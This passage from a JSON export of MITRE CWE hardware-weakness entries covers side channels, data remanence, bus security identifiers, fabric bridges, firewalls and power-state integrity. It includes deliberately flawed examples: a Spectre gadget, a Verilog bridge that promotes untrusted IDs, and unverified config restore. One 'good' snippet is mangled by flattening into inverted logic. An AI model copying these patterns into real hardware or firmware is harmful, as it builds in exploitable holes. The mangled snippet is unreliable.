references"},{"attr":{"@_Type":"Content"},"Contribution_Name":"Nicole Fern","Contribution_Organization":"Riscure","Contribution_Date":"2021-10-13","Contribution_Comment":"Provided detection methods, observed examples, and references"}]}},"1301":{"attr":{"@_ID":"1301","@_Name":"Insufficient or Incomplete Data Removal within Hardware Component","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product\'s data removal process does not completely delete all data and potentially sensitive information within hardware components.","Extended_Description":{"xhtml:p":["Physical properties of hardware devices, such as remanence of magnetic media, residual charge of ROMs/RAMs, or screen burn-in may still retain sensitive data after a data removal process has taken place and power is removed.","Recovering data after erasure or overwriting is possible due to a phenomenon called data remanence. For example, if the same value is written repeatedly to a memory location, the corresponding memory cells can become physically altered to a degree such that even after the original data is erased that data can still be recovered through physical characterization of the memory cells."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"226","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":["Read Memory","Read Application Data"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Apply blinding or masking techniques to implementations of cryptographic algorithms."},{"Phase":"Implementation","Description":"Alter the method of erasure, add protection of media, or destroy the media to protect the data."}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"37"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1117"}},{"attr":{"@_External_Reference_ID":"REF-1118"}},{"attr":{"@_External_Reference_ID":"REF-1119"}},{"attr":{"@_External_Reference_ID":"REF-1120"}},{"attr":{"@_External_Reference_ID":"REF-1055"}}]},"Notes":{"Note":{"#text":"This entry is still under development and will continue to see updates and content improvements.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"Nicole Fern","Submission_Organization":"Tortuga Logic","Submission_Date":"2020-05-29"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}]}},"1302":{"attr":{"@_ID":"1302","@_Name":"Missing Security Identifier","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product implements a security identifier mechanism to differentiate what actions are allowed or disallowed when a transaction originates from an entity. A transaction is sent without a security identifier.","Extended_Description":{"xhtml:p":["In a System-On-Chip (SoC), various integrated circuits and hardware engines generate transactions such as to access (reads/writes) assets or perform certain actions (e.g., reset, fetch, compute). A typical transaction is comprised of source identity (to identify the originator of the transaction) and a destination identity (to route the transaction to the respective entity) in addition to much more information in the message. Sometimes the transactions are qualified with a Security Identifier.  This Security Identifier helps the destination agent decide on the set of allowed or disallowed actions.","A common weakness that can exist in such transaction schemes is that the source agent fails to include the necessary, security identifier with the transaction.  Because of the missing security identifier, the destination agent might drop the message, thus resulting in Denial-of-Service (DoS), or get confused in its attempt to execute the given action, which confusion could result in privilege escalation or a gain of unintended access."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1294","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"Such issues could be introduced during hardware architecture and design and identified later during Testing or System Configuration phases."},{"Phase":"Implementation","Note":"Such issues could be introduced during implementation and identified later during Testing or System Configuration phases."}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control"],"Impact":["Modify Memory","Read Memory","DoS: Crash, Exit, or Restart","Bypass Protection Mechanism","Execute Unauthorized Code or Commands"],"Likelihood":"High"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Transaction details must be reviewed for design inconsistency and common weaknesses."},{"Phase":"Implementation","Description":"Security identifier definition and programming flow must be tested in pre-silicon and post-silicon testing."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":{"xhtml:p":["Consider a system with a register for storing AES key for encryption or decryption. The key is of 128 bits implemented as a set of four 32-bit registers.  The key registers are assets, and the register AES_KEY_ACCESS_POLICY is defined to provide the necessary access controls.","The access-policy register defines which agents with a security identifier in the transaction can access the AES-key registers. Each bit in this 32-bit register defines a security identifier. There could be a maximum of 32 security identifiers that are allowed accesses to the AES-key registers. The number of the bit when set (i.e., \u201c1\u201d) allows for a respective action from an agent whose identity matches the number of the bit; if set to \u201c0\u201d (i.e., Clear), it disallows the respective action to that corresponding agent."]},"Example_Code":[{"attr":{"@_Nature":"bad"},"xhtml:table":{"xhtml:tr":[{"xhtml:th":["Register","Field description"]},{"xhtml:td":["AES_ENC_DEC_KEY_0","AES key [0:31] for encryption or decryption, Default 0x00000000"]},{"xhtml:td":["AES_ENC_DEC_KEY_1","AES key [32:63] for encryption or decryption, Default 0x00000000"]},{"xhtml:td":["AES_ENC_DEC_KEY_2","AES key [64:95] for encryption or decryption, Default 0x00000000"]},{"xhtml:td":["AES_ENC_DEC_KEY_4","AES key [96:127] for encryption or decryption, Default 0x00000000"]},{"xhtml:td":["AES_KEY_ACCESS_POLICY","[31:0] Default 0x00000004 \u2013 agent with Security Identifier \u201c2\u201d has access to AES_ENC_DEC_KEY_0 through AES_ENC_DEC_KEY_4 registers"]}]}},{"attr":{"@_Nature":"good"},"xhtml:table":{"xhtml:tr":[{"xhtml:th":["Register","Field description"]},{"xhtml:td":["AES_ENC_DEC_KEY_0","AES key [0:31] for encryption or decryption, Default 0x00000000"]},{"xhtml:td":["AES_ENC_DEC_KEY_1","AES key [32:63] for encryption or decryption, Default 0x00000000"]},{"xhtml:td":["AES_ENC_DEC_KEY_2","AES key [64:95] for encryption or decryption, Default 0x00000000"]},{"xhtml:td":["AES_ENC_DEC_KEY_4","AES key [96:127] for encryption or decryption, Default 0x00000000"]},{"xhtml:td":["AES_KEY_ACCESS_POLICY","[31:0] Default 0x00000002 \u2013 agent with security identifier \u201c2\u201d has access to AES_ENC_DEC_KEY_0 through AES_ENC_DEC_KEY_4 registers"]}]}}],"Body_Text":["The originator sends a transaction with no security identifier, i.e., meaning the value is \u201c0\u201d or NULL. The AES-Key-access register does not allow the necessary action and drops the transaction because the originator failed to include the required security identifier.","The originator should send a transaction with Security Identifier \u201c2\u201d which will allow access to the AES-Key-access register and allow encryption and decryption operations."]}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"1"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna","Submission_Organization":"Intel Corporation","Submission_Date":"2020-02-14"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}}},"1303":{"attr":{"@_ID":"1303","@_Name":"Non-Transparent Sharing of Microarchitectural Resources","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"Hardware structures shared across execution contexts (e.g., caches and branch predictors) can violate the expected architecture isolation between contexts.","Extended_Description":{"xhtml:p":["Modern processors use techniques such as out-of-order execution, speculation, prefetching, data forwarding, and caching to increase performance. Details about the implementation of these techniques are hidden from the programmer\u2019s view. This is problematic when the hardware implementation of these techniques results in resources being shared across supposedly isolated contexts. Contention for shared resources between different contexts opens covert channels that allow malicious programs executing in one context to recover information from another context.","Some examples of shared micro-architectural resources that have been used to leak information between contexts are caches, branch prediction logic, and load or store buffers. Speculative and out-of-order execution provides an attacker with increased control over which data is leaked through the covert channel.","If the extent of resource sharing between contexts in the design microarchitecture is undocumented, it is extremely difficult to ensure system assets are protected against disclosure."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1189","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"203","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"Such issues could be introduced during hardware architecture and design and identified later during Testing or System Configuration phases."},{"Phase":"Implementation","Note":"Such issues could be introduced during implementation and identified later during Testing or System Configuration phases."}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":["Read Application Data","Read Memory"],"Note":"Microarchitectural side-channels have been used to leak specific information such as cryptographic keys, and Address Space Layout Randomization (ALSR) offsets as well as arbitrary memory."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Microarchitectural covert channels can be addressed using a mixture of hardware and software mitigation techniques. These include partitioned caches, new barrier and flush instructions, and disabling high resolution performance counters and timers."},{"Phase":"Requirements","Description":"Microarchitectural covert channels can be addressed using a mixture of hardware and software mitigation techniques. These include partitioned caches, new barrier and flush instructions, and disabling high resolution performance counters and timers."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":{"xhtml:p":["Secure programs perform bounds checking before accessing an array if the source of the array index is provided by an untrusted source such as user input. In the code below, data from array1 will not be accessed if x is out of bounds. However, if this code executes on a processor that performs speculative execution the outcome of the if statement could be mis-predicted and the access on the next line will occur with a value of x that can point to arbitrary locations in the program\u2019s memory (out-of-bounds).","Even though the processor rolls back the architectural effects of the mis-predicted branch, the memory accesses alter data cache state, which is not rolled back after the branch is resolved. The cache state can reveal array1[x] thereby providing a mechanism to recover any word in this program\u2019s memory space."]},"Example_Code":{"#text":"if (x &lt; array1_size)\\n    \\t\\t\\t\\t\\t\\ty = array2[array1[x] * 4096];","attr":{"@_Nature":"bad"}},"Body_Text":"Code snippet is from the Spectre paper: https://spectreattack.com/spectre.pdf."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"663"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1121"}},{"attr":{"@_External_Reference_ID":"REF-1122"}},{"attr":{"@_External_Reference_ID":"REF-1123"}},{"attr":{"@_External_Reference_ID":"REF-1124"}}]},"Content_History":{"Submission":{"Submission_Name":"Nicole Fern","Submission_Organization":"Tortuga Logic","Submission_Date":"2020-05-08"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Related_Attack_Patterns"}}},"1304":{"attr":{"@_ID":"1304","@_Name":"Improperly Preserved Integrity of Hardware Configuration State During a Power Save/Restore Operation","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product performs a power save/restore\\n            operation, but it does not ensure that the integrity of\\n            the configuration state is maintained and/or verified between\\n\\t    the beginning and ending of the operation.","Extended_Description":{"xhtml:p":"Before powering down, the Intellectual\\n                Property (IP) saves current state (S) to persistent\\n                storage such as flash or always-on memory in order to\\n                optimize the restore operation.  During this process,\\n                an attacker with access to the persistent storage may\\n                alter (S) to a configuration that could potentially\\n                modify privileges, disable protections, and/or cause\\n                damage to the hardware. If the IP does not validate\\n                the configuration state stored in persistent memory,\\n                upon regaining power or becoming operational again,\\n                the IP could be compromised through the activation of\\n                an unwanted/harmful configuration."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"345","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"1271","@_View_ID":"1194"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"Weakness introduced via missing internal integrity guarantees during power save/restore"},{"Phase":"Integration","Note":"Weakness introduced via missing external integrity verification during power save/restore"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["DoS: Instability","DoS: Crash, Exit, or Restart","DoS: Resource Consumption (Other)","Gain Privileges or Assume Identity","Bypass Protection Mechanism","Alter Execution Logic","Quality Degradation","Unexpected State","Reduce Maintainability","Reduce Performance","Reduce Reliability"],"Likelihood":"High"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Inside the IP, incorporate integrity checking\\n                        on the configuration state via a cryptographic\\n                        hash. The hash can be protected inside the IP such as\\n                        by storing it in internal registers which never lose\\n                        power. Before powering down, the IP performs a hash of\\n                        the configuration and saves it in these persistent\\n                        registers. Upon restore, the IP performs a hash of the\\n                        saved configuration and compares it with the\\n                        saved hash. If they do not match, then the IP should\\n                        not trust the configuration."},{"Phase":"Integration","Description":"Outside the IP, incorporate integrity checking\\n                        of the configuration state via a trusted agent. Before\\n                        powering down, the trusted agent performs a hash of the\\n                        configuration and saves the hash in persistent storage.\\n                        Upon restore, the IP requests the trusted agent\\n                        validate its current configuration. If the\\n                        configuration hash is invalid, then the IP should not\\n                        trust the configuration."},{"Phase":"Integration","Description":"Outside the IP, incorporate a protected\\n                        environment that prevents undetected modification of\\n                        the configuration state by untrusted agents. Before\\n                        powering down, a trusted agent saves the IP\u2019s\\n                        configuration state in this protected location that\\n                        only it is privileged to. Upon restore, the trusted\\n                        agent loads the saved state into the IP."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following pseudo code demonstrates the\\n                        power save/restore workflow which may lead to weakness\\n                        through a lack of validation of the config state after\\n                        restore.","Example_Code":[{"#text":"void save_config_state(){}void restore_config_state(){}","attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:br":["","","","","","",""],"xhtml:div":[{"#text":"void* cfg;cfg = get_config_state();save_config_state(cfg);go_to_sleep();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","",""]},{"#text":"void* cfg;cfg = get_config_file();load_config_file(cfg);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]}]},{"#text":"void save_config_state(){}void restore_config_state(){}","attr":{"@_Nature":"good","@_Language":"C"},"xhtml:br":["","","","","","",""],"xhtml:div":[{"#text":"void* cfg;void* sha;cfg = get_config_state();save_config_state(cfg);// save hash(cfg) to trusted locationsha = get_hash_of_config_state(cfg);save_hash(sha);go_to_sleep();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","","","","","","",""]},{"#text":"void* cfg;void* sha_1, sha_2;cfg = get_config_file();// restore hash of config from trusted memorysha_1 = get_persisted_sha_value();sha_2 = get_hash_of_config_state(cfg);if (sha_1 != sha_2)load_config_file(cfg);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","","","","","","",""],"xhtml:div":{"#text":"assert_error_and_halt();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}]}],"Body_Text":["The following pseudo-code is the proper workflow for the integrity checking mitigation:","It must be noted that in the previous example of\\n                        good pseudo code, the memory (where the hash of the\\n                        config state is stored) must be trustworthy while the\\n                        hardware is between the power save and restore states."]}},"Functional_Areas":{"Functional_Area":"Power"},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"176"}}},"Content_History":{"Submission":{"Submission_Organization":"Accellera Systems Initiative","Submission_Date":"2020-07-16"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Functional_Areas"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}]}},"1310":{"attr":{"@_ID":"1310","@_Name":"Missing Ability to Patch ROM Code","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"Missing an ability to patch ROM code may leave a System or System-on-Chip (SoC) in a vulnerable state.","Extended_Description":{"xhtml:p":["A System or System-on-Chip (SoC) that implements a boot process utilizing security mechanisms such as Root-of-Trust (RoT) typically starts by executing code from a Read-only-Memory (ROM) component. The code in ROM is immutable, hence any security vulnerabilities discovered in the ROM code can never be fixed for the systems that are already in use.","A common weakness is that the ROM does not have the ability to patch if security vulnerabilities are uncovered after the system gets shipped.  This leaves the system in a vulnerable state where an adversary can compromise the SoC."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1329","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"1277","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"This issue could be introduced during hardware architecture and design and can be identified later during Testing."},{"Phase":"Implementation","Note":"This issue could be introduced during implementation and can be identified later during Testing."},{"Phase":"Integration","Note":"This issue could be introduced during integration and can be identified later during Testing."},{"Phase":"Manufacturing","Note":"This issue could be introduced during manufacturing and can be identified later during Testing."}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":["Varies by Context","Reduce Maintainability"],"Likelihood":"High","Note":"A consequence of this is that the system is unable to be patched and leaves it in a vulnerable state."}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation"],"Description":{"xhtml:ul":{"xhtml:li":["1. Secure patch support to allow ROM code to be patched at next boot.","2. Support patches that can be programmed in-field or during manufacturing through hardware fuses. This feature can be used to do limited patching of device after shipping or for next batch of silicon devices manufactured without changing the full device ROM."]}},"Effectiveness":"Moderate","Effectiveness_Notes":"Some part of the hardware initialization or signature verification done to authenticate patches will always be \\"not patchable.\\"  Hardware-fuse-based patches will also have limitations in terms of size and the number of patches that can be supported."}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-146"},"Intro_Text":{"xhtml:p":"A System-on-Chip (SOC) implements a Root-of-Trust (RoT) in ROM to boot secure code. However, at times this ROM code might have security vulnerabilities and need to be patched. Since ROM is immutable, it can be impossible to patch."},"Body_Text":"ROM does not have built-in application-programming interfaces (APIs) to patch if the code is vulnerable. Implement mechanisms to patch the vulnerable ROM code."}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1121"}},{"attr":{"@_External_Reference_ID":"REF-1122"}},{"attr":{"@_External_Reference_ID":"REF-1123"}},{"attr":{"@_External_Reference_ID":"REF-1124"}}]},"Content_History":{"Submission":{"Submission_Name":"Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-04-25"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Demonstrative_Examples, Maintenance_Notes"}]}},"1311":{"attr":{"@_ID":"1311","@_Name":"Improper Translation of Security Attributes by Fabric Bridge","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The bridge incorrectly translates security attributes from either trusted to untrusted or from untrusted to trusted when converting from one fabric protocol to another.","Extended_Description":{"xhtml:p":["A bridge allows IP blocks supporting different fabric protocols to be integrated into the system.  Fabric end-points or interfaces usually have dedicated signals to transport security attributes. For example, HPROT signals in AHB, AxPROT signals in AXI, and MReqInfo and SRespInfo signals in OCP.","The values on these signals are used to indicate the security attributes of the transaction. These include the immutable hardware identity of the controller initiating the transaction, privilege level, and type of transaction (e.g., read/write, cacheable/non-cacheable, posted/non-posted).","A weakness can arise if the bridge IP block, which translates the signals from the protocol used in the IP block endpoint to the protocol used by the central bus, does not properly translate the security attributes. As a result, the identity of the initiator could be translated from untrusted to trusted or vice-versa. This could result in access-control bypass, privilege escalation, or denial of service."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"Verilog","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"VHDL","@_Prevalence":"Undetermined"}}],"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Access Control"],"Impact":["Modify Memory","Read Memory","Gain Privileges or Assume Identity","Bypass Protection Mechanism","Execute Unauthorized Code or Commands"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"The translation must map signals in such a way that untrusted agents cannot map to trusted agents or vice-versa."},{"Phase":"Implementation","Description":"Ensure that the translation maps signals in such a way that untrusted agents cannot map to trusted agents or vice-versa."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":{"xhtml:p":["The bridge interfaces between OCP and AHB end points. OCP uses MReqInfo signal to indicate security attributes, whereas AHB uses HPROT signal to indicate the security attributes. The width of MReqInfo can be customized as needed. In this example, MReqInfo is 5-bits wide and carries the privilege level of the OCP controller.","The values 5\u2019h11, 5\u2019h10, 5\u2019h0F, 5\u2019h0D, 5\u2019h0C, 5\u2019h0B, 5\u2019h09, 5\u2019h08, 5\u2019h04, and 5\u2019h02 in MReqInfo indicate that the request is coming from a privileged state of the OCP bus controller. Values 5\u2019h1F, 5\u2019h0E, and 5\u2019h00 indicate untrusted, privilege state.","Though HPROT is a 5-bit signal, we only consider the lower, two bits in this example. HPROT values 2\u2019b00 and 2\u2019b10 are considered trusted, and 2\u2019b01 and 2\u2019b11 are considered untrusted.","The OCP2AHB bridge is expected to translate trusted identities on the controller side to trusted identities on the responder side.  Similarly, it is expected to translate untrusted identities on the controller side to untrusted identities on the responder side."]},"Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Verilog"},"xhtml:div":{"#text":"module ocp2ahb(ahb_hprot,ocp_mreqinfo);output [1:0] ahb_hprot;        // output is 2 bit signal for AHB HPROTinput [4:0] ocp_mreqinfo;      // input is 5 bit signal from OCP MReqInfowire [6:0] p0_mreqinfo_o_temp; // OCP signal that transmits hardware identity of bus controllerwire y;reg [1:0] ahb_hprot;// hardware identity of bus controller is in bits 5:1 of p0_mreqinfo_o_temp signalassign p0_mreqinfo_o_temp[6:0] = {1\'b0, ahb_hprot[4:0], y};always @*begincase (p0_mreqinfo_o_temp[4:2])000: ahb_hprot = 2\'b11;    // OCP MReqInfo to AHB HPROT mapping001: ahb_hprot = 2\'b00;010: ahb_hprot = 2\'b00;011: ahb_hprot = 2\'b01;100: ahb_hprot = 2\'b00;101: ahb_hprot = 2\'b00;110: ahb_hprot = 2\'b10;111: ahb_hprot = 2\'b00;endcaseendendmodule","xhtml:br":["","","","","","","","","","","","","","","","","","","","","","","","","","","","","",""]}},"Body_Text":"Logic in the case statement only checks for MReqInfo bits 4:2, i.e., hardware-identity bits 3:1. When ocp_mreqinfo is 5\u2019h1F or 5\u2019h0E, p0_mreqinfo_o_temp[2] will be 1. As a result, untrusted IDs from OCP 5\u2019h1F and 5\u2019h0E get translated to trusted ahb_hprot values 2\u2019b00."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"1"}},{"attr":{"@_CAPEC_ID":"180"}},{"attr":{"@_CAPEC_ID":"233"}}]},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Manna","Submission_Organization":"Intel Corporation","Submission_Date":"2020-05-24"}}},"1312":{"attr":{"@_ID":"1312","@_Name":"Missing Protection for Mirrored Regions in On-Chip Fabric Firewall","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The firewall in an on-chip fabric protects the main addressed region, but it does not protect any mirrored memory or memory-mapped-IO (MMIO) regions.","Extended_Description":{"xhtml:p":"Few fabrics mirror memory and address ranges, where mirrored regions contain copies of the original data. This redundancy is used to achieve fault tolerance. Whatever protections the fabric firewall implements for the original region should also apply to the mirrored regions. If not, an attacker could bypass existing read/write protections by reading from/writing to the mirrored regions to leak or corrupt the original data."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"1251","@_View_ID":"1194"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Access Control"],"Impact":["Modify Memory","Read Memory","Bypass Protection Mechanism"]}},"Detection_Methods":{"Detection_Method":{"Method":"Manual Dynamic Analysis","Description":"Using an external debugger, send write transactions to mirrored regions to test if original, write-protected regions are modified. Similarly, send read transactions to mirrored regions to test if the original, read-protected signals can be read.","Effectiveness":"High"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"The fabric firewall should apply the same protections as the original region to the mirrored regions."},{"Phase":"Implementation","Description":"The fabric firewall should apply the same protections as the original region to the mirrored regions."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"A memory-controller IP block is connected to the on-chip fabric in a System on Chip (SoC).  The memory controller is configured to divide the memory into four parts: one original and three mirrored regions inside the memory. The upper two bits of the address indicate which region is being addressed. 00 indicates the original region and 01, 10, and 11 are used to address the mirrored regions. All four regions operate in a lock-step manner and are always synchronized. The firewall in the on-chip fabric is programmed to protect the assets in the memory.","Body_Text":["The firewall only protects the original range but not the mirrored regions.","The attacker (as an unprivileged user) sends a write transaction to the mirrored region. The mirrored region has an address with the upper two bits set to \u201c10\u201d and the remaining bits of the address pointing to an asset. The firewall does not block this write transaction. Once the write is successful, contents in the protected-memory region are also updated. Thus, the attacker can bypass existing, memory protections.","Firewall should protect mirrored regions."]}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"1"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1134"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati K. Manna","Submission_Organization":"Intel Corporation","Submission_Date":"2020-06-01"}}},"1313":{"attr":{"@_ID":"1313","@_Name":"Hardware Allows Activation of Test or Debug Logic at Runtime","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"During runtime, the hardware allows for test or debug logic (feature) to be activated, which allows for changing the state of the hardware. This feature can alter the intended behavior of the system and allow for alteration and leakage of sensitive data by an adversary.","Extended_Description":{"xhtml:p":"An adversary can take advantage of test or debug logic that is made accessible through the hardware during normal operation to modify the intended behavior of the system. For example, an accessible Test/debug mode may allow read/write access to any system data. Using error injection (a common test/debug feature) during a transmit/receive operation on a bus, data may be modified to produce an unintended message. Similarly, confidentiality could be compromised by such features allowing access to secrets."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"Such issues could be introduced during hardware architecture and design and identified later during Testing or System Configuration phases."},{"Phase":"Implementation","Note":"Such issues could be introduced during implementation and identified later during Testing or System Configuration phases."},{"Phase":"Integration","Note":"Such issues could be introduced during integration and identified later during Testing or System configuration phases."}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":["Modify Memory","Read 